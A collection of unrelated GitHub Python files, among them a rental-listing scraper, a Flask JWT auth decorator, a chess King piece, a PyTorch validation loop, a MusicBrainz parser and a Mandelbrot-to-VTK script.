'fields': [('is_staff', 'is_superuser')],\n }),\n )\n list_display = ('id', 'email', 'username', 'first_name', 'last_name')\n list_display_links = ('id', 'email', 'username')\n search_fields = ('email', 'username')\n list_filter = ('email', 'username')\n\n\nadmin.site.register(Subscription)\n","repo_name":"Andrey11995/foodgram-project-react","sub_path":"backend/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32414614140","text":"# -*- coding: utf-8 -*-\r\n'''\r\n@author: Yalei Meng E-mail: yaleimeng@sina.com\r\n@license: (C) Copyright 2017, HUST Corporation Limited.\r\n@desc:爬取某城市小猪短租的前300多条房源的基本信息。主要是描述、地址、价位,房屋图片链接,房东网名、照片、性别;\r\n并写入csv表格。如果需要其他信息请根据实际需要修改。\r\n@DateTime: Created on 2017/9/4,at 19:36\r\n'''\r\nfrom bs4 import BeautifulSoup\r\nimport requests as rq\r\nimport time\r\nimport csv\r\n\r\n #从首页出发。目标是分析300个链接。根据数字规律构造网址的列表。\r\nsite =['http://gz.xiaozhu.com/search-duanzufang-p{}-0/'.format(str(i)) for i in range(1,15)]\r\nua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3192.0 Safari/537.36'\r\nhead = {'User-Agent':ua}\r\n\r\nnewUrls=set()\r\ncsvRows = []\r\n# def updatePage(soup):\r\n# pages = soup.find_all('a',target='_self') #从页脚获得新的页面链接。\r\n# for page in pages: #只把全新的页面加入到新页面集合。\r\n# if page['href'] not in newPages and page['href'] not in oldPages:\r\n# newPages.add(page['href'])\r\n# print(newPages)\r\n\r\ndef getAllurls(web):\r\n r = rq.get(web, headers=head)\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n out = soup.find('ul', class_='pic_list clearfix').find_all('li') # 这里是需要访问的单个元素网页。\r\n for var in out:\r\n url = var.find('a')['href']\r\n if url not in newUrls:\r\n newUrls.add(url)\r\n print(url)\r\n\r\ndef dealPage(myPage):\r\n r = rq.get(myPage)\r\n soup = BeautifulSoup(r.text, 'lxml')\r\n #print(soup)\r\n if soup.find('div', class_='member_pic').find('div')['class'] == ['member_ico1']:\r\n gender = 'female'\r\n else:\r\n gender = 'male'\r\n data ={\r\n 'title' :soup.find('div',{'class':'pho_info'}).find('em').text,\r\n 'address':soup.find('div',class_='con_l').find('p')['title'],\r\n 'roomPic':soup.find('div',class_='pho_show_big').find('img')['src'],\r\n 'price':soup.find('div',class_='day_l').find('span').text,\r\n 'owner':soup.find('div',class_='w_240').find('a')['title'],\r\n 'gender': gender,\r\n 'ownerPic': soup.find('div', class_='member_pic').find('a')['href'],\r\n }\r\n csvRows.append(data)\r\n print(data)\r\n\r\nfor st in site: #从site每个页面分别请求,并添加url到newUrls。300个为止。\r\n getAllurls(st)\r\n time.sleep(1.5)\r\n if len(newUrls)>=300:\r\n break\r\n\r\nfor eve in newUrls: #针对newUrls里面每个url,做详情页的爬取。\r\n dealPage(eve)\r\n time.sleep(1.5)\r\n\r\n#把词典数据写入到csv文件。\r\nprint('字典列表的个数为%d'%len(csvRows))\r\nrowHeader = ['title','address','roomPic','price','owner','gender','ownerPic']\r\nwith open('E:/romm.csv','w',encoding='utf-8')as f:\r\n f_csv = csv.DictWriter(f,rowHeader)\r\n f_csv.writeheader()\r\n f_csv.writerows(csvRows)\r\n","repo_name":"yaleimeng/spider_for_XiaoZhu","sub_path":"smallPig.py","file_name":"smallPig.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31093977551","text":"# -*- coding: utf-8 -*-\n#\n# POC for Glances 3 (Core)\n#\n# Nicolargo (08/2017)\n#\n# Three main threads will be run by the core:\n# - Update the stats (thanks to the Stats class). 
Each plugin will be running\n# in another thread.\n# - (optionnaly) Display the stats (thanks to the Outputs class)\n# - (optionnaly) Export the stats (thanks to the Exports class)\n\nimport signal\nimport threading\nfrom plugin import Plugin\n\n\nclass TestPlugin(Plugin):\n pass\n\n\nclass Stats(object):\n\n def __init__(self):\n # Dict of plugins\n # key: Plugin name\n # value: Plugin instance\n self.plugins = {}\n\n # Init the plugins\n for i in range(1, 10):\n pname = 'plugin%s' % (i - 1)\n self.plugins[pname] = TestPlugin(name=pname)\n\n def loop(self):\n update_thread = threading.Thread(name=\"update\",\n target=self.update)\n export_thread = threading.Thread(name=\"export\",\n target=self.export)\n display_thread = threading.Thread(name=\"display\",\n target=self.display)\n\n update_thread.start()\n export_thread.start()\n display_thread.start()\n\n def update(self, timeout=3):\n # Init the threads list\n plugin_threads = []\n for pname, p in self.plugins.iteritems():\n t = threading.Thread(name=pname,\n target=p.update,\n args=('ITEM',))\n plugin_threads.append(t)\n\n # Start all the threads\n for p in plugin_threads:\n p.start()\n\n # Wait the end of the threads\n for p in plugin_threads:\n p.join(timeout=timeout)\n if p.isAlive():\n # Process is still running\n # Kill it\n self.kill(p.name)\n p.join()\n\n def export(self, timeout=3):\n for pname, p in self.plugins.iteritems():\n p.export()\n\n def display(self, refresh=3):\n for pname, p in self.plugins.iteritems():\n p.display()\n\n def kill(self, thread_name):\n self.plugins[thread_name].stop()\n\n def stop(self, signal, frame):\n for p in self.plugins:\n p.stop()\n\n\ndef main():\n s = Stats()\n signal.signal(signal.SIGINT, s.stop)\n s.loop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nicolargo/pythonarena","sub_path":"glancesarena/glances3/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"71343045585","text":"import re\n\nimport write_read_file\n\n\ndef change_base(base_name, last_name):\n change_list = []\n file = write_read_file.write_read_base(base_name, 'r')\n for line in file:\n if line.find(last_name) == -1:\n change_list.append(line.strip())\n return change_list\n\n\ndef replace_base(base_name, last_name):\n change_list = []\n file = write_read_file.write_read_base(base_name, 'r')\n try:\n for line in file:\n if line.find(last_name) != -1:\n print(line.strip())\n pattern = input(\"Введите данные которые нужно заменить\\n: \").title()\n line_change = input(\"Введите на что нужно поменять\\n: \").title()\n new_line = line.strip().replace(pattern, line_change)\n change_list.append(new_line)\n else:\n change_list.append(line.strip())\n return change_list\n except ValueError:\n pass\n\n\ndef employee_search(base_name, last_name):\n change_list = []\n file = write_read_file.write_read_base(base_name, 'r')\n for line in file:\n if line.find(last_name) != -1:\n change_list.append(line.strip())\n return change_list\n","repo_name":"Kvezac/homework21","sub_path":"lesson21_homework/python/sort_change_file.py","file_name":"sort_change_file.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6108905080","text":"######\n# segmentation task\n######\n\n@torch.no_grad()\ndef valid_one_epoch(model, dataloader, device, epoch):\n model.eval()\n \n dataset_size = 0\n running_loss = 0.0\n \n 
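# per-batch [dice, iou] pairs are collected in val_scores and reduced to epoch-level metrics with np.mean(val_scores, axis=0) before returning\n    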
val_scores = []\n \n pbar = tqdm(enumerate(dataloader), total=len(dataloader), desc='Valid ')\n for step, (images, masks) in pbar: \n images = images.to(device, dtype=torch.float)\n masks = masks.to(device, dtype=torch.float)\n \n batch_size = images.size(0)\n \n y_pred = model(images)\n loss = criterion(y_pred, masks)\n \n running_loss += (loss.item() * batch_size)\n dataset_size += batch_size\n \n epoch_loss = running_loss / dataset_size\n \n y_pred = nn.Sigmoid()(y_pred)\n val_dice = dice_coef(masks, y_pred).cpu().detach().numpy()\n val_jaccard = iou_coef(masks, y_pred).cpu().detach().numpy()\n val_scores.append([val_dice, val_jaccard])\n \n mem = torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0\n current_lr = optimizer.param_groups[0]['lr']\n pbar.set_postfix(valid_loss=f'{epoch_loss:0.4f}',\n lr=f'{current_lr:0.5f}',\n gpu_memory=f'{mem:0.2f} GB')\n val_scores = np.mean(val_scores, axis=0)\n torch.cuda.empty_cache()\n gc.collect()\n \n return epoch_loss, val_scores","repo_name":"naoki901373/ML-Template","sub_path":"valid/valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36759849088","text":"from Pieces.piece import Piece\nfrom Pieces.empty import Empty\nfrom Pieces.rook import Rook\n\n\nclass King(Piece):\n \"\"\"King piece\"\"\"\n\n def __init__(self):\n \"\"\"Initialize piece attributes\"\"\"\n super().__init__()\n self.display = 'K'\n self.has_moved = False\n \n def check_position(self, board, player, p1):\n \"\"\"Returns '1' if position is valid.\"\"\"\n \n possible_positions = []\n\n for count in range(0, 8):\n # Reset row and col\n row = self.get_position()[0]\n col = self.get_position()[1]\n\n # Check top\n if count == 0:\n row = row - 1\n\n # Check right\n elif count == 1:\n col = col + 1\n\n # Check left\n elif count == 2:\n col = col - 1\n\n # Check bottom\n elif count == 3:\n row = row + 1\n\n # Check top-left\n elif count == 4:\n row = row - 1\n col = col - 1\n\n # Check top-right\n elif count == 5:\n row = row - 1\n col = col + 1\n\n # Check bottom-left\n elif count == 6:\n row = row + 1\n col = col - 1\n\n # Check bottom-right\n elif count == 7:\n row = row + 1\n col = col + 1\n\n try:\n if row >= 0:\n board_pos = board.board[row][col]\n\n # Check if new position is empty or held by enemy\n if isinstance(board_pos['piece'], Empty) or board_pos['piece']['piece'].get_color() != self.get_color():\n possible_positions.append(board_pos)\n except:\n continue\n\n # King & Rook swap\n if not self.has_moved:\n row = self.get_position()[0]\n col = self.get_position()[1]\n board_pos = board.board[row]\n\n # Right\n if isinstance(board_pos[col + 1]['piece'], Empty) and isinstance(board_pos[col + 2]['piece'], Empty):\n if isinstance(board_pos[col + 3]['piece']['piece'], Rook) and board_pos[col + 3]['piece']['piece'].has_moved == False:\n col = col + 2\n board_pos = board.board[row][col]\n possible_positions.append(board_pos)\n\n # Left\n board_pos = board.board[row]\n if isinstance(board_pos[col - 1]['piece'], Empty) and isinstance(board_pos[col - 2]['piece'], Empty) and isinstance(board_pos[col - 3]['piece'], Empty):\n if isinstance(board_pos[col - 4]['piece']['piece'], Rook) and board_pos[col - 4]['piece']['piece'].has_moved == False:\n col = col - 2\n board_pos = board.board[row][col]\n possible_positions.append(board_pos)\n\n return 
possible_positions","repo_name":"omnz/Chess","sub_path":"Pieces/king.py","file_name":"king.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33707377111","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nq = 1.6e-19\n\nE = np.arange(10*1000*q,60*1000*q,q/10)\ndef bremsstrahlung_cross_section(E,E_e, Z):\n alpha = 1/137\n dsigma_dE = (4*np.pi*alpha**2*Z**2)/E * ((E+E_e)/E_e) * ((E/E_e) + (E_e/E) - 1 + np.log(E_e/E))\n return dsigma_dE\n\n# B = bremsstrahlung_cross_section(E,max(E),11)\n# plt.plot(E,B)\n# plt.show()\n\n\n\n\n\ndata = pd.read_csv(r\"X-Ray\\Data\\16-01-2023\\NaCl Full Data.csv\",skiprows=0)\nprint(data)\n\n\nangle = data['angle']\nwav = data['wav / pm']\nenergy = np.sort(data['E / keV'])\ncount_0 = data['R_0 / 1/s']\n\n\nE_B = bremsstrahlung_cross_section(energy,max(energy),11)\nplt.plot(energy,E_B*max(count_0))\nplt.plot(energy,count_0)\nplt.show()\n\n\n\n\n\n\n","repo_name":"Jacob-J-E/Y3Lab","sub_path":"X-Ray Crystal Diffraction/X-Ray/Session_4_19_01_2023/bremsstrahlung.py","file_name":"bremsstrahlung.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29417824960","text":"import pygame\nvec = pygame.math.Vector2\nfrom .player import Player\nfrom .constants import GameConstants\nclass Camera:\n def __init__(self,player :Player):\n self.player = player\n self.x = 0\n self.y = 0\n self.width = GameConstants.BACKGROUNWIDTH\n def scroll(self):\n x_camera = self.player.rect.x - (GameConstants.GAMEWIDTH/2 - self.player.rect.w/2)\n if x_camera < 0:\n x_camera = 0\n if x_camera + GameConstants.GAMEWIDTH > self.width:\n x_camera = self.width - GameConstants.GAMEWIDTH\n self.x = -x_camera\n ","repo_name":"c0ngthanh/RPGGame","sub_path":"filegame/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21022152187","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 23 10:14:07 2018\n\n@author: Sc\n\"\"\"\n\nimport sys\nimport re\n\nif len(sys.argv) > 1:\n f = open(sys.argv[1], \"rU\",encoding='utf-8') \nelse:\n f = open(\"wc.py\",\"rU\",encoding='utf-8')\n #f = sys.stdin\n \ncodelinenum = 1 \nfor line in f.readlines():\n if (re.match(r'^ *\\n',line) or line.startswith('#')):\n print(line,file=sys.stdout, end='')\n #elif(re.match(r\"(^ *\"\"\")|(^ *''')\"):\n else:\n print(codelinenum,line,file=sys.stdout, end='')\n codelinenum = codelinenum + 1\n \nf.close()\n\n\n\n\n","repo_name":"0oSco0/systemprogram","sub_path":"kadai1/nl.py","file_name":"nl.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43417852017","text":"\r\n# 0.5 씩 좌우로 간격을 둬야 한다.\r\n# 그럼 L 만큼 커버가 가능한거네\r\n\r\nfrom collections import deque\r\nN, L = map(int, input().split())\r\nlocation = list(map(int, input().split()))\r\n\r\nlocation.sort()\r\nlocation = deque(location)\r\n# print(location)\r\nstart = location.popleft()\r\ncnt = 1\r\nwhile len(location) != 0:\r\n node = location.popleft()\r\n if start + L - 1 < node:\r\n start = node\r\n cnt += 1\r\nprint(cnt)\r\n","repo_name":"Guitarboyjason/Algorithm","sub_path":"백준/Silver/1449. 
수리공 항승/수리공 항승.py","file_name":"수리공 항승.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11002235742","text":"from ioUtils import getFile\nfrom fsUtils import isFile\nfrom webUtils import getHTML, isBS4\nfrom strUtils import fixName\nfrom math import ceil, floor\nfrom hashlib import md5\n\nfrom dbBase import dbBase\n\nclass artistMBIDClass:\n def __init__(self, ID=None, err=None):\n self.ID=ID\n self.err=err\n \n def get(self):\n return self.__dict__\n \n \nclass artistMBURLClass:\n def __init__(self, url=None, err=None):\n self.url = url\n self.err = err\n \n def get(self):\n return self.__dict__\n \n \nclass artistMBNameClass:\n def __init__(self, name=None, err=None):\n self.name = name\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBMediaClass:\n def __init__(self, err=None):\n self.media = {}\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBMediaDataClass:\n def __init__(self, album=None, url=None, aclass=None, aformat=None, artist=None, code=None, year=None, err=None):\n self.album = album\n self.url = url\n self.aclass = aclass\n self.aformat = aformat\n self.artist = artist\n self.code = code\n self.year = year\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBMediaAlbumClass:\n def __init__(self, url=None, album=None, aformat=None, err=None):\n self.url = url\n self.album = album\n self.aformat = aformat\n self.err = err \n \n def get(self):\n return self.__dict__\n\n \nclass artistMBMediaCountsClass:\n def __init__(self, err=None):\n self.counts = {}\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBPageClass:\n def __init__(self, ppp = None, tot = None, more=None, redo=None, err=None):\n self.ppp = ppp\n self.tot = tot\n if isinstance(ppp, int) and isinstance(tot, int):\n self.pages = int(ceil(tot/ppp))\n else:\n self.pages = None\n\n self.err = err\n\n self.more = more\n self.redo = redo\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBProfileClass:\n def __init__(self, profile=None, aliases=None, members=None, sites=None, groups=None, variations=None, err=None):\n self.profile = profile\n self.aliases = aliases\n self.members = members\n self.sites = sites\n self.groups = groups\n self.variations = variations\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBURLInfo:\n def __init__(self, name=None, url=None, ID=None, err=None):\n self.name = name\n self.url = url\n self.ID = ID\n self.err = err\n \n def get(self):\n return self.__dict__\n \n\nclass artistMBDataClass:\n def __init__(self, artist=None, url=None, ID=None, pages=None, profile=None, media=None, mediaCounts=None, err=None):\n self.artist = artist\n self.url = url\n self.ID = ID\n self.pages = pages\n self.profile = profile\n self.media = media\n self.mediaCounts = mediaCounts\n self.err = err\n \n def get(self):\n return self.__dict__\n \n \n def show(self):\n print(\"MusicBrainz Artist Data Class\")\n print(\"-------------------------\")\n print(\"Artist: {0}\".format(self.artist.name))\n print(\"URL: {0}\".format(self.url.url))\n print(\"ID: {0}\".format(self.ID.ID))\n print(\"Pages: {0}\".format(self.pages.get()))\n print(\"Media: {0}\".format(self.mediaCounts.get()))\n for mediaType,mediaTypeAlbums in self.media.media.items():\n print(\" {0}\".format(mediaType))\n for album in mediaTypeAlbums:\n print(\" {0}\".format(album.album)) \n \n def 
get(self):\n return self.__dict__\n\n\n \nclass artistMB(dbBase):\n def __init__(self, debug=False):\n self.debug = debug\n \n def getData(self, inputdata):\n if isinstance(inputdata, str):\n if isFile(inputdata):\n try:\n bsdata = getHTML(getFile(inputdata))\n except:\n try:\n bsdata = getHTML(getFile(inputdata, version=2))\n except:\n raise ValueError(\"Cannot read artist file: {0}\".format(inputdata))\n else:\n try:\n bsdata = getHTML(inputdata)\n except:\n raise ValueError(\"Not sure about string input: {0} . It is not a file\".format(inputdata))\n elif isBS4(inputdata):\n bsdata = inputdata\n pass\n else:\n raise ValueError(\"Not sure about input type: {0}\".format(type(inputdata)))\n\n self.bsdata = bsdata\n \n return self.parse()\n \n \n \n \n def getNamesAndURLs(self, content):\n data = []\n if content is not None:\n for ref in content.findAll(\"a\"):\n url = ref.attrs['href']\n name = ref.text\n\n ID = None\n data.append(artistMBURLInfo(name=name, url=url, ID=ID))\n return data\n\n\n\n\n\n #######################################################################################################################################\n ## Artist URL\n #######################################################################################################################################\n def getartistMBURL(self):\n artistData = self.bsdata.find(\"div\", {\"class\": \"artistheader\"})\n if artistData is None:\n auc = artistMBURLClass(err=True)\n return auc\n \n h1 = artistData.find(\"h1\")\n if h1 is None:\n auc = artistMBURLClass(err=\"NoH1\")\n \n ref = self.getNamesAndURLs(h1)\n try:\n artistURL = ref[0].url\n auc = artistMBURLClass(url=artistURL, err=None)\n except:\n auc = artistMBURLClass(err=\"TxtErr\")\n\n return auc\n\n \n\n #######################################################################################################################################\n ## Artist ID\n ####################################################################################################################################### \n def getartistMBDiscID(self, suburl):\n ival = \"/artist\"\n if isinstance(suburl, artistMBURLClass):\n suburl = suburl.url\n if not isinstance(suburl, str):\n aic = artistMBIDClass(err=\"NotStr\") \n return aic\n\n pos = suburl.find(ival)\n if pos == -1:\n aic = artistMBIDClass(err=\"NotArtist\") \n return aic\n\n uuid = suburl[pos+len(ival)+1:]\n\n \n m = md5()\n for val in uuid.split(\"-\"):\n m.update(val.encode('utf-8'))\n hashval = m.hexdigest()\n discID = str(int(hashval, 16))\n \n try:\n int(discID)\n except:\n aic = artistMBIDClass(err=\"NotInt\") \n return aic\n\n aic = artistMBIDClass(ID=discID)\n return aic\n \n \n\n #######################################################################################################################################\n ## Artist Name\n #######################################################################################################################################\n def getartistMBName(self):\n artistData = self.bsdata.find(\"div\", {\"class\": \"artistheader\"})\n if artistData is None:\n anc = artistMBNameClass(err=True)\n return anc\n \n h1 = artistData.find(\"h1\")\n if h1 is None:\n anc = artistMBNameClass(err=\"NoH1\")\n \n ref = self.getNamesAndURLs(h1)\n try:\n artistName = ref[0].name\n anc = artistMBNameClass(name=artistName, err=None)\n except:\n anc = artistMBNameClass(err=\"TxtErr\")\n \n return anc\n \n \n\n 
#######################################################################################################################################\n ## Artist Media\n #######################################################################################################################################\n def getartistMBMediaAlbum(self, td):\n amac = artistMBMediaAlbumClass()\n for span in td.findAll(\"span\"):\n attrs = span.attrs\n if attrs.get(\"class\"):\n if 'format' in attrs[\"class\"]:\n albumformat = span.text\n albumformat = albumformat.replace(\"(\", \"\")\n albumformat = albumformat.replace(\")\", \"\")\n amac.format = albumformat\n continue\n span.replaceWith(\"\")\n\n ref = td.find(\"a\")\n if ref:\n amac.url = ref.attrs['href']\n amac.album = ref.text\n else:\n amac.err = \"NoText\"\n\n return amac\n \n \n def getartistMBMedia(self):\n amc = artistMBMediaClass()\n \n \n mediaTypes = [x.text for x in self.bsdata.findAll(\"h3\")]\n tables = dict(zip(mediaTypes, self.bsdata.findAll(\"table\")))\n\n for mediaType, table in tables.items():\n headers = [x.text for x in table.findAll(\"th\")]\n trs = table.findAll('tr')\n for tr in trs[1:]:\n tds = tr.findAll(\"td\")\n\n ## Year\n idx = headers.index(\"Year\")\n year = tds[idx].text\n\n ## Title\n idx = headers.index(\"Title\")\n refs = [x.attrs['href'] for x in tds[idx].findAll('a')]\n if len(refs) == 0:\n raise ValueError(\"No link for album\")\n url = refs[0]\n album = tds[idx].text\n\n \n m = md5()\n uuid = url.split(\"/\")[-1]\n for val in uuid.split(\"-\"):\n m.update(val.encode('utf-8'))\n hashval = m.hexdigest()\n code = int(hashval, 16)\n \n\n ## Artist\n idx = headers.index(\"Artist\")\n artists = []\n for artistVal in tds[idx].findAll('a'):\n url = artistVal.attrs['href']\n name = artistVal.text\n m = md5()\n uuid = url.split(\"/\")[-1]\n for val in uuid.split(\"-\"):\n m.update(val.encode('utf-8'))\n hashval = m.hexdigest()\n ID = int(hashval, 16)\n artists.append(artistMBURLInfo(name=name, url=url, ID=ID))\n \n\n amdc = artistMBMediaDataClass(album=album, url=url, aclass=None, aformat=None, artist=artists, code=code, year=year)\n if amc.media.get(mediaType) is None:\n amc.media[mediaType] = []\n amc.media[mediaType].append(amdc)\n\n \n \n\n return amc\n \n \n\n #######################################################################################################################################\n ## Artist Media Counts\n ####################################################################################################################################### \n def getartistMBMediaCounts(self, media):\n \n amcc = artistMBMediaCountsClass()\n \n credittype = \"Releases\"\n if amcc.counts.get(credittype) == None:\n amcc.counts[credittype] = {}\n for creditsubtype in media.media.keys():\n amcc.counts[credittype][creditsubtype] = int(len(media.media[creditsubtype]))\n \n return amcc\n \n \n amcc.err = \"No Counts\"\n return amcc\n \n results = self.bsdata.findAll(\"ul\", {\"class\": \"facets_nav\"})\n if results is None or len(results) == 0:\n amcc.err = \"No Counts\"\n return amcc\n \n for result in results:\n for li in result.findAll(\"li\"):\n ref = li.find(\"a\")\n if ref:\n attrs = ref.attrs\n span = ref.find(\"span\", {\"class\": \"facet_count\"})\n count = None\n if span:\n count = span.text\n credittype = attrs.get(\"data-credit-type\")\n creditsubtype = attrs.get(\"data-credit-subtype\")\n if credittype and creditsubtype:\n if amcc.counts.get(credittype) == None:\n amcc.counts[credittype] = {}\n if 
amcc.counts[credittype].get(creditsubtype) == None:\n try:\n amcc.counts[credittype][creditsubtype] = int(count)\n except:\n amcc.counts[credittype][creditsubtype] = count\n amcc.err = \"Non Int\"\n\n return amcc\n \n \n\n #######################################################################################################################################\n ## Artist Variations\n #######################################################################################################################################\n def getartistMBProfile(self):\n data = {} \n genres = self.bsdata.find(\"div\", {\"class\": \"genre-list\"})\n genre = self.getNamesAndURLs(genres)\n style = []\n data[\"Profile\"] = {'genre': genre, 'style': style}\n \n apc = artistMBProfileClass(profile=data.get(\"Profile\"), aliases=data.get(\"Aliases\"),\n members=data.get(\"Members\"), groups=data.get(\"In Groups\"),\n sites=data.get(\"Sites\"), variations=data.get(\"Variations\"))\n return apc\n\n\n \n #######################################################################################################################################\n ## Artist Pages\n #######################################################################################################################################\n def getartistMBPages(self):\n apc = artistMBPageClass()\n from numpy import ceil\n bsdata = self.bsdata\n\n try:\n pages = bsdata.find(\"ul\", {\"class\": \"pagination\"})\n lis = pages.findAll(\"li\")\n txts = [li.text for li in lis]\n npages = 0\n for item in txts:\n try:\n npages = max([npages, int(item)])\n except:\n continue\n \n apc = artistMBPageClass(ppp=100, tot=100*npages, redo=False, more=True)\n except:\n apc = artistMBPageClass(ppp=100, tot=1, redo=False, more=False)\n \n return apc\n\n\n\n def parse(self):\n bsdata = self.bsdata\n \n artist = self.getartistMBName()\n url = self.getartistMBURL()\n ID = self.getartistMBDiscID(url)\n pages = self.getartistMBPages()\n profile = self.getartistMBProfile()\n media = self.getartistMBMedia()\n mediaCounts = self.getartistMBMediaCounts(media)\n \n err = [artist.err, url.err, ID.err, pages.err, profile.err, mediaCounts.err, media.err]\n \n adc = artistMBDataClass(artist=artist, url=url, ID=ID, pages=pages, profile=profile, mediaCounts=mediaCounts, media=media, err=err)\n \n return adc","repo_name":"tgadf/discogs","sub_path":"artistMB.py","file_name":"artistMB.py","file_ext":"py","file_size_in_byte":16139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24379705191","text":"# -*- coding: utf-8 -*-\nimport jwt\nimport datetime\nimport functools\nfrom apps.nosql_db import r, r_3\nfrom jwt import exceptions\nfrom apps.error import ApiError\nfrom functools import wraps\nfrom flask import g, request, current_app, jsonify\n\n\n# 构造一个密钥\n# SALT = \"zhananbudanchou1234678\"\nSALT = \"mengnaiaihuachachacha\"\n\n# 构造 headers\nheaders = {\n \"typ\": \"jwt\",\n \"alg\": \"HS256\"\n}\n\n\n# 创建 JWT\ndef create_jwt(username, password):\n payload = {\n \"username\": username,\n \"password\": password\n }\n\n result = jwt.encode(payload=payload, key=SALT, algorithm=\"HS256\",\n headers=headers)\n return result\n\n\n# 用于认证普通用户\ndef login_required(func):\n\n @wraps(func)\n def decorate(*args, **kwargs):\n if hasattr(g, \"username\"):\n return g.username\n auth_jwt = request.headers.get('token')\n g.username = None\n try:\n \"判断token的校验结果\"\n payload = jwt.decode(auth_jwt, SALT, algorithms=['HS256'])\n \"获取载荷中的信息赋值给g对象\"\n g.username = 
payload.get(\"username\")\n # print(g.username)\n assert r.get(g.username) == auth_jwt\n except Exception as e:\n print(e)\n return jsonify({\n \"code\": 201,\n \"message\": \"抱歉,用户未登录!\",\n \"data\": None,\n \"ok\": False\n })\n\n return func(*args, **kwargs)\n\n return decorate\n\n\n# 单独实现一个解析jwt_token的函数\ndef parse_jwt(auth_jwt, db):\n payload = jwt.decode(auth_jwt, SALT, algorithms=['HS256'])\n user = db.find_one({\"username\": payload.get(\"username\")})\n return user\n\n\n# 用于认证后台管理用户\ndef permission_required(func):\n @wraps(func)\n def decorate(*args, **kwargs):\n if hasattr(g, \"admin_username\"):\n return g.admin_username\n x_api_key = request.headers.get(\"XAPIKEY\")\n g.admin_username = None\n try:\n g.admin_username = r_3.get(x_api_key)\n assert x_api_key == r_3.get(g.admin_username)\n except Exception as e:\n print(e)\n return jsonify({\n \"code\": 201,\n \"message\": \"抱歉,用户权限认证失败!\",\n \"data\": None,\n \"ok\": False\n })\n return func(*args, **kwargs)\n\n return decorate\n\n\n\n","repo_name":"WanwanLinLin/FlaskBackend","sub_path":"apps/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71257077265","text":"\"\"\"\nconfig.py\n~~~~~~~~~\n\nCommon configuration settings for scripts used to make the AgroSuccess \nsuccession rules table.\n\"\"\"\nimport os \nimport sys\n\nDATA_DIR = os.path.abspath(\"/home/andrew/Documents/phd/models/\"\n \"AgroSuccess/data\")\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\nDIRS = {\n \"scripts\": THIS_DIR,\n \"logs\": os.path.join(THIS_DIR, \"logs\"),\n \"data\": {\n \"raw\": os.path.join(DATA_DIR, \"raw\"),\n \"created\": os.path.join(DATA_DIR, \"created\"),\n \"tmp\": os.path.join(DATA_DIR, \"tmp\"),\n },\n}\n\ndef ensure_dirs_exist(dir_list):\n \"\"\"Given list of dir names, recursively create dirs if they don't exist.\"\"\"\n for d in dir_list:\n try:\n os.makedirs(d)\n except FileExistsError:\n pass\n\ndef exit_if_file_missing(fname):\n \"\"\"Exit program if given file name doesn't exit.\"\"\"\n if not os.path.isfile(fname):\n sys.exit(\"Source file {0} does not exist.\".format(fname))\n\n# Check if all data and logs directories exist, make them if not\nensure_dirs_exist(list(DIRS[\"data\"].values()) + [DIRS[\"logs\"]])","repo_name":"lanecodes/agrosuccess-graph","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31823031969","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom pyevtk.hl import gridToVTK\n\ndef mandelbrot_set(X, Y, maxiter, horizon = 2.0):\n C = X + Y[:, None] * 1j\n N = np.zeros(C.shape, dtype = int)\n Z = np.zeros(C.shape, np.complex64)\n for n in range(maxiter):\n if n % (maxiter / 10) == 0:\n print('progress: %d/%d' % (n, maxiter))\n I = np.less(abs(Z), horizon)\n N[I] = n\n Z[I] = Z[I] ** 2 + C[I]\n return Z.transpose(), N.transpose()\n\nnx = 800\nny = 600\nx = np.linspace(-2.25, 0.75, nx, dtype=np.float32)\ny = np.linspace(-1.25, 1.25, ny, dtype=np.float32)\nz = np.linspace(0.0, 1.0, 1, dtype=np.float32)\n\nZ, N = mandelbrot_set(x, y, 2000, 